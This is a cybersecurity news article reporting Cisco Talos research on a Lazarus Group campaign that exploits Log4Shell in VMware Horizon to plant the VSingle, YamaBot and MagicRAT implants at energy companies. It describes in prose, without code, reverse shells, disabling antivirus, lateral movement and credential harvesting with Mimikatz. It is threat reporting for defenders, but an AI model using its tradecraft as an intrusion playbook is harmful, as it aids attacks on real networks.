Cybercrime , Cybercrime as-a-service , Cyberwarfare / Nation-State Attacks
Latest Lazarus Campaign Targets Energy CompaniesLog4Shell Vulnerability on VMWare Horizon Servers Exploited
The Lazarus Group, a North Korean advanced persistent threat gang, recently targeted energy companies in Canada, the U.S. and Japan to establish long-term access into victim networks to conduct espionage operations by deploying custom-built malware implants.
See Also: LIVE Webinar | Stop, Drop (a Table) & Roll: An SQL Highlight Discussion
The latest campaign tracked by Cisco Talos researchers uncovered that the threat actors exploited vulnerabilities in VMware Horizon to gain an initial foothold into targeted organizations, followed by the deployment of the group's custom-built malware implants VSingle, YamaBot and a previously unknown malware implant dubbed MagicRAT.
Researchers say that the campaign is to establish long-term access into victim networks to siphon off proprietary intellectual property from unnamed energy companies.
The malicious activity was spotted between February and July 2022. Threat actors exploited the Log4Shell vulnerability on VMware Horizon public-facing servers in a few campaigns as the initial attack vector (see: Log4Shell Update: VMware Horizon Targeted).
The RATs identified by the researchers, VSingle and YamaBot, are developed and distributed by Lazarus. Japanese CERT published details about them and attributed the campaigns to Lazarus.
Researchers say they observed several attacks targeting multiple victims and that two specific attack instances are the most "representative of the playbooks employed by Lazarus in this campaign."
The first instance is the use of the VSingle implant, and the second is the deployment of MagicRAT along with VSingle. A third intrusion set worth noting is the use of a third implant known as YamaBot.
With exploiting the Log4Shell vulnerability on VMWare Horizon public-facing servers as the initial attack vector, Cisco Talos researchers say that the compromise is followed by a series of activities to establish a foothold on the systems before the attackers deploy additional malware and move laterally across the network.
During the investigation, they uncovered two different foothold payloads. In the first, they used abused
node.exe, which is shipped with VMware to execute the oneliner
node.exe script, which helps open an "interactive reverse shell that attackers could use to issue arbitrary commands on the infected entry endpoint."
The other instance is the exploitation of vulnerabilities in VMWare to launch custom PowerShell scripts on the infected endpoint via VMWare's
"Since VMware Horizon is executed with administrator privileges, the attacker doesn't have to worry about elevating their privileges. After the interactive shell is established, the attackers perform a preliminary reconnaissance on the endpoint to get network information and directory listings," the researchers say.
In the next step, threat actors deactivate the Windows Defender components through registry key changes, WMIC commands and PowerShell commands.
Upon successfully shutting down the AV on the system using the reverse shell, it enables attackers to deploy the malware implant VSingle.
The whole deployment process involves downloading a legitimate WinRAR utility from a remote location controlled by the attackers along with an additional payload.
The additional payload downloaded to the endpoint is decompressed and consists of "the VSingle malware executable which is optionally renamed and then persisted on the endpoint by creating an auto-start service."
Cisco Talos investigations led to the discovery of commands fed to the VSingle backdoor by the attackers to carry out a variety of activities such as reconnaissance, exfiltration and manual backdooring.
In one of the intrusion attempts, the researcher found that the attackers initially deployed VSingle on the endpoint but later when the sample was detected, it was at the risk of losing access to the enterprise. In this case, attackers deployed another variant of VSingle for maintaining continued access, before finally moving to the YamaBot implant.
The custom-made GoLang-based malware family YamaBot uses HTTP to communicate with its command-and-control servers and begins by sending preliminary system information about the infected endpoint to the C2: computer name, username and MAC address.
This implant has standard RAT capabilities such as list files and directories, and it can send process information to C2, download files from remote locations, execute arbitrary commands on the endpoints and uninstall itself.
Discovery of MagicRAT
In a separate victim network, Cisco Talos researchers saw a similar chain of events: initial recon followed by disabling the AV software and the deployment of an implant.
They also observed lateral movement into other endpoints in the enterprise. "What's unique in this intrusion, however, is that we observed the deployment of a fairly new implant three days before the attackers deployed VSingle on the infected systems," researchers say.
In further lateral movements, after the initial access, the attackers conducted limited reconnaissance of the endpoint and deployed two different malware families, MagicRAT and VSingle, to maintain covert access.
"The attackers then started to perform Active Directory-related explorations to identify potential endpoints to laterally move into," the researchers say. "Once the list of computers and users is obtained, the attackers would manually ping specific endpoints in the list to verify if they are reachable."
The researchers observed the deployment of impacket tools on certain endpoints to move laterally and establish an interactive shell, which was done manually by a human operator.
"While trying to establish interactive remote console sessions, we can see the operators making errors on the commands," the researchers say.
These attackers take their own time to explore the infected machine and whenever they find a file of interest, they put it on a .rar archive for exfiltration using one of the custom-developed implants running on the system.
The infection chains remained the same, but some of the other key variations observed by the researchers include optional activities conducted by the APT group in different intrusion attempts:
- Credential harvesting using tools such as Mimikatz and Procdump;
- Proxy tools to set up SOCKS proxies;
- Reverse tunneling tools such as PuTTY's plink.